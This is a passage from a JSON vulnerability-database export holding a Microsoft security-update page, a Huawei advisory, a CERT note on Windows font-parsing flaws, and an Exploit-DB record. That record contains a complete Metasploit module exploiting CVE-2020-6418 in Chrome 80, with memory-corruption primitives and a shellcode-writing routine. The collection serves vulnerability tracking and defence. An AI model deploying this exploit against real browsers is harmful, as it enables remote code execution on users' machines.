"CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", 
"CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2022-08-24T11:29:05", "description": "None\nNEW \n**IMPORTANT **We have been evaluating the public health situation, and we understand this is impacting our customers. In response to these challenges, we are prioritizing our focus on security updates. Starting in May 2020, we are pausing all optional non-security releases (C and D updates) for all the supported versions of Windows client and server products (Windows 10, version 1909 down to Windows Server 2008 SP2).There is no change to the monthly security updates (B release \u2013 Update Tuesday); these will continue as planned to ensure business continuity and to keep our customers protected and productive.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. 
Key changes include:\n\n * Security updates to Windows Kernel, Windows App Platform and Frameworks, Microsoft Graphics Component, Windows Media, Windows Fundamentals, Windows Core Networking, and the Microsoft JET Database Engine.\n\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update**\n\nMicrosoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions. If you are using Windows Update, the latest SSU (KB4540725) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). 
**Install this update**\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4550970>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows: **Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro; **Classification**: Security Updates \n\n**File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 4550970](<https://download.microsoft.com/download/1/b/5/1b5db5d6-ea6e-4677-b4b1-04bf31735622/4550970.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-14T07:00:00", "type": "mskb", "title": "April 14, 2020\u2014KB4550970 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1027"], 
"modified": "2020-04-14T07:00:00", "id": "KB4550970", "href": "https://support.microsoft.com/en-us/help/4550970", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2021-12-30T12:25:57", "description": "Microsoft released a security advisory to disclose an elevation of privilege vulnerability which exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application. (Vulnerability ID: HWPSIRT-2020-04145)\n\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-1027.\n\nHuawei has released software updates to fix this vulnerability. This advisory is available at the following link:\n\n<http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200805-01-windows-en>\n\n \n\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-05T00:00:00", "type": "huawei", "title": "Security Advisory - Elevation of Privilege Vulnerability in Some Microsoft Windows Systems", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", 
"authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1027"], "modified": "2020-08-05T00:00:00", "id": "HUAWEI-SA-20200805-01-WINDOWS", "href": "https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200805-01-windows-en", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2021-09-28T17:50:22", "description": "### Overview\n\nMicrosoft Windows contains two vulnerabilities in the parsing of Adobe Type 1 fonts, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\nAdobe Type Manager, which is provided by `atmfd.dll`, is a kernel module that is provided by Windows and provides support for OpenType fonts. Two vulnerabilities in the Microsoft Windows Adobe Type Manager library may allow an unauthenticated remote attacker to execute arbitrary code on a vulnerable system. This vulnerability affects all supported versions of Windows, as well as Windows 7. This vulnerability is being exploited in the wild. \n \n--- \n \n### Impact\n\nBy causing a Windows system to open a specially crafted document or view it in the Windows preview pane, an unauthenticated remote attacker may be able to execute arbitrary code with kernel privileges on a vulnerable system. Windows 10 based operating systems would execute the code with limited privileges, in an [AppContainer](<https://docs.microsoft.com/en-us/windows/win32/secauthz/appcontainer-isolation>) sandbox. \n \n--- \n \n### Solution\n\n**Apply an update**\n\nThis issue has been addressed in [Microsoft updates for CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>). 
Please also consider the following workarounds that are listed in [Microsoft Security Advisory ADV200006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>): \n \n--- \n \n**Rename ATMFD.DLL** \n \nThis mitigation appears to be the most effective workaround for this vulnerability, as it blocks the vulnerable code from being used by Windows. Please see [Microsoft Security Advisory ADV200006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>) for more details. Because supported Windows 10 versions do not use ATMFD.DLL, this mitigation is not applicable on those platforms. \n \n**Disable the preview pane and details pane in Windows Explorer** \n \nPlease see [Microsoft Security Advisory ADV200006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>) for more details. \n \n**Disable the WebClient service** \n \nPlease see [Microsoft Security Advisory ADV200006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>) for more details. \n \n--- \n \n### Vendor Information\n\n
### Microsoft Affected\n\nNotified: March 23, 2020. Updated: April 14, 2020. \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9 | E:F/RL:W/RC:C \nEnvironmental | 9.0 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>\n * <https://docs.microsoft.com/en-us/windows/win32/secauthz/appcontainer-isolation>\n\n### Acknowledgements\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2020-1020](<http://web.nvd.nist.gov/vuln/detail/CVE-2020-1020>) \n---|--- \n**Date Public:** | 2020-03-23 \n**Date First Published:** | 2020-03-23 \n**Date Last Updated:** | 2020-04-14 18:00 UTC \n**Document Revision:** | 26 \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-23T00:00:00", "type": "cert", "title": "Microsoft Windows Type 1 font parsing remote code execution vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2020-04-14T18:00:00", "id": "VU:354840", "href": "https://www.kb.cert.org/vuls/id/354840", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T06:07:32", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-09T00:00:00", "type": "exploitdb", "title": "Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-6418", "CVE-2020-6418"], "modified": "2020-03-09T00:00:00", "id": "EDB-ID:48186", "href": "https://www.exploit-db.com/exploits/48186", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit',\r\n 'Description' => %q{\r\n This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit\r\n corrupts the length of a float array (float_rel), which can then be used for out\r\n of bounds read and write on adjacent memory.\r\n The relative read and write is then used to modify a UInt64Array (uint64_aarw)\r\n which is used for read and writing from absolute memory.\r\n The exploit then uses WebAssembly in order to allocate a region of RWX memory,\r\n which is then replaced with the payload shellcode.\r\n The payload is executed within the sandboxed renderer process, so the browser\r\n must be run with the --no-sandbox option for the payload to work correctly.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Cl\u00e9ment Lecigne', # discovery\r\n 'Istv\u00e1n Kurucsai', # exploit\r\n 'Vignesh S Rao', # exploit\r\n 'timwr', # metasploit copypasta\r\n ],\r\n 'References' => [\r\n ['CVE', '2020-6418'],\r\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],\r\n ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],\r\n ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],\r\n ],\r\n 'Arch' => [ ARCH_X64 ],\r\n 'DefaultTarget' => 0,\r\n 'Targets' =>\r\n [\r\n ['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}],\r\n ['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}],\r\n ],\r\n 'DisclosureDate' => 'Feb 19 2020'))\r\n register_advanced_options([\r\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show 
debug information during exploitation\", false]),\r\n ])\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\r\n print_status(\"[*] #{request.body}\")\r\n send_response(cli, '')\r\n return\r\n end\r\n\r\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\r\n escaped_payload = Rex::Text.to_unescape(payload.raw)\r\n jscript = %Q^\r\nvar shellcode = unescape(\"#{escaped_payload}\");\r\n\r\n// HELPER FUNCTIONS\r\nlet conversion_buffer = new ArrayBuffer(8);\r\nlet float_view = new Float64Array(conversion_buffer);\r\nlet int_view = new BigUint64Array(conversion_buffer);\r\nBigInt.prototype.hex = function() {\r\n return '0x' + this.toString(16);\r\n};\r\nBigInt.prototype.i2f = function() {\r\n int_view[0] = this;\r\n return float_view[0];\r\n}\r\nBigInt.prototype.smi2f = function() {\r\n int_view[0] = this << 32n;\r\n return float_view[0];\r\n}\r\nNumber.prototype.f2i = function() {\r\n float_view[0] = this;\r\n return int_view[0];\r\n}\r\nNumber.prototype.f2smi = function() {\r\n float_view[0] = this;\r\n return int_view[0] >> 32n;\r\n}\r\n\r\nNumber.prototype.fhw = function() {\r\n float_view[0] = this;\r\n return int_view[0] >> 32n;\r\n}\r\n\r\nNumber.prototype.flw = function() {\r\n float_view[0] = this;\r\n return int_view[0] & BigInt(2**32-1);\r\n}\r\n\r\nNumber.prototype.i2f = function() {\r\n return BigInt(this).i2f();\r\n}\r\nNumber.prototype.smi2f = function() {\r\n return BigInt(this).smi2f();\r\n}\r\n\r\nfunction hex(a) {\r\n return a.toString(16);\r\n}\r\n\r\n//\r\n// EXPLOIT\r\n//\r\n\r\n// the number of holes here determines the OOB write offset\r\nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];\r\nvar float_rel; // float array, initially corruption target\r\nvar float_carw; // float array, used for reads/writes within the compressed heap\r\nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space\r\nvar obj_leaker; // used to 
implement addrof\r\nvuln.pop();\r\nvuln.pop();\r\nvuln.pop();\r\n\r\nfunction empty() {}\r\n\r\nfunction f(nt) {\r\n // The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug\r\n vuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05);\r\n for (var i = 0; i < 0x10000; ++i) {};\r\n}\r\n\r\nlet p = new Proxy(Object, {\r\n get: function() {\r\n vuln[0] = {};\r\n float_rel = [0.2, 1.2, 2.2, 3.2, 4.3];\r\n float_carw = [6.6];\r\n uint64_aarw = new BigUint64Array(4);\r\n obj_leaker = {\r\n a: float_rel,\r\n b: float_rel,\r\n };\r\n\r\n return Object.prototype;\r\n }\r\n});\r\n\r\nfunction main(o) {\r\n for (var i = 0; i < 0x10000; ++i) {};\r\n return f(o);\r\n}\r\n\r\n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel\r\nfunction crel_read4(offset) {\r\n var qw_offset = Math.floor(offset / 2);\r\n if (offset & 1 == 1) {\r\n return float_rel[qw_offset].fhw();\r\n } else {\r\n return float_rel[qw_offset].flw();\r\n }\r\n}\r\n\r\n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel\r\nfunction crel_write4(offset, val) {\r\n var qw_offset = Math.floor(offset / 2);\r\n // we are writing an 8-byte double under the hood\r\n // read out the other half and keep its value\r\n if (offset & 1 == 1) {\r\n temp = float_rel[qw_offset].flw();\r\n new_val = (val << 32n | temp).i2f();\r\n float_rel[qw_offset] = new_val;\r\n } else {\r\n temp = float_rel[qw_offset].fhw();\r\n new_val = (temp << 32n | val).i2f();\r\n float_rel[qw_offset] = new_val;\r\n }\r\n}\r\n\r\nconst float_carw_elements_offset = 0x14;\r\n\r\nfunction cabs_read4(caddr) {\r\n elements_addr = caddr - 8n | 1n;\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_read4: ' + hex(float_carw[0].f2i()));\r\n res = float_carw[0].flw();\r\n // TODO restore elements ptr\r\n return res;\r\n}\r\n\r\n\r\n// This function provides 
arbitrary within read the compressed heap\r\nfunction cabs_read8(caddr) {\r\n elements_addr = caddr - 8n | 1n;\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_read8: ' + hex(float_carw[0].f2i()));\r\n res = float_carw[0].f2i();\r\n // TODO restore elements ptr\r\n return res;\r\n}\r\n\r\n// This function provides arbitrary write within the compressed heap\r\nfunction cabs_write4(caddr, val) {\r\n elements_addr = caddr - 8n | 1n;\r\n\r\n temp = cabs_read4(caddr + 4n | 1n);\r\n print('cabs_write4 temp: '+ hex(temp));\r\n\r\n new_val = (temp << 32n | val).i2f();\r\n\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_write4 prev_val: '+ hex(float_carw[0].f2i()));\r\n\r\n float_carw[0] = new_val;\r\n // TODO restore elements ptr\r\n return res;\r\n}\r\n\r\nconst objleaker_offset = 0x41;\r\nfunction addrof(o) {\r\n obj_leaker.b = o;\r\n addr = crel_read4(objleaker_offset) & BigInt(2**32-2);\r\n obj_leaker.b = {};\r\n return addr;\r\n}\r\n\r\nconst uint64_externalptr_offset = 0x1b; // in 8-bytes\r\n\r\n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array\r\nfunction read8(addr) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n val = uint64_aarw[0];\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n return val;\r\n}\r\n\r\n// Arbitrary write. 
We corrupt the backing store of the `uint64_aarw` array and then write into the array\r\nfunction write8(addr, val) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n uint64_aarw[0] = val;\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n return val;\r\n}\r\n\r\n// Given an array of bigints, this will write all the elements to the address provided as argument\r\nfunction writeShellcode(addr, sc) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset - 1] = 10;\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n for (var i = 0; i < sc.length; ++i) {\r\n uint64_aarw[i] = sc[i]\r\n }\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n}\r\n\r\n\r\nfunction get_compressed_rw() {\r\n\r\n for (var i = 0; i < 0x10000; ++i) {empty();}\r\n\r\n main(empty);\r\n main(empty);\r\n\r\n // Function would be jit compiled now.\r\n main(p);\r\n\r\n print(`Corrupted length of float_rel array = ${float_rel.length}`);\r\n}\r\n\r\nfunction get_arw() {\r\n get_compressed_rw();\r\n print('should be 0x2: ' + hex(crel_read4(0x15)));\r\n let previous_elements = crel_read4(0x14);\r\n //print(hex(previous_elements));\r\n //print(hex(cabs_read4(previous_elements)));\r\n //print(hex(cabs_read4(previous_elements + 4n)));\r\n cabs_write4(previous_elements, 0x66554433n);\r\n //print(hex(cabs_read4(previous_elements)));\r\n //print(hex(cabs_read4(previous_elements + 4n)));\r\n\r\n print('addrof(float_rel): ' + hex(addrof(float_rel)));\r\n uint64_aarw[0] = 0x4142434445464748n;\r\n}\r\n\r\nfunction rce() {\r\n function get_wasm_func() {\r\n var 
importObject = {\r\n imports: { imported_func: arg => print(arg) }\r\n };\r\n bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\r\n wasm_code = new Uint8Array(bc);\r\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\r\n return wasm_mod.exports.exported_func;\r\n }\r\n\r\n let wasm_func = get_wasm_func();\r\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\r\n let wasm_func_addr = addrof(wasm_func);\r\n let sfi = cabs_read4(wasm_func_addr + 12n) - 1n;\r\n print('sfi: ' + hex(sfi));\r\n let WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n;\r\n print('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData));\r\n\r\n let instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n;\r\n print('instance: ' + hex(instance));\r\n\r\n let wasm_rwx_addr = cabs_read8(instance + 0x68n);\r\n print('wasm_rwx_addr: ' + hex(wasm_rwx_addr));\r\n\r\n // write the shellcode to the RWX page\r\n while(shellcode.length % 4 != 0){\r\n shellcode += \"\\u9090\";\r\n }\r\n\r\n let sc = [];\r\n\r\n // convert the shellcode to BigInt\r\n for (let i = 0; i < shellcode.length; i += 4) {\r\n sc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000));\r\n }\r\n\r\n writeShellcode(wasm_rwx_addr,sc);\r\n\r\n print('success');\r\n wasm_func();\r\n}\r\n\r\n\r\nfunction exp() {\r\n get_arw();\r\n rce();\r\n}\r\n\r\nexp();\r\n^\r\n\r\n if datastore['DEBUG_EXPLOIT']\r\n debugjs = %Q^\r\nprint = function(arg) 
{\r\n var request = new XMLHttpRequest();\r\n request.open(\"POST\", \"/print\", false);\r\n request.send(\"\" + arg);\r\n};\r\n^\r\n jscript = \"#{debugjs}#{jscript}\"\r\n else\r\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\r\n jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\r\n end\r\n\r\n html = %Q^\r\n<html>\r\n<head>\r\n<script>\r\n#{jscript}\r\n</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n ^\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\r\n end\r\n\r\nend", "sourceHref": "https://www.exploit-db.com/download/48186", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T15:07:09", "description": "This update for chromium fixes the following issues :\n\nChromium was updated to version 80.0.3987.122 (bsc#1164828).\n\nSecurity issues fixed :\n\n - CVE-2020-6418: Fixed a type confusion in V8 (bsc#1164828).\n\n - 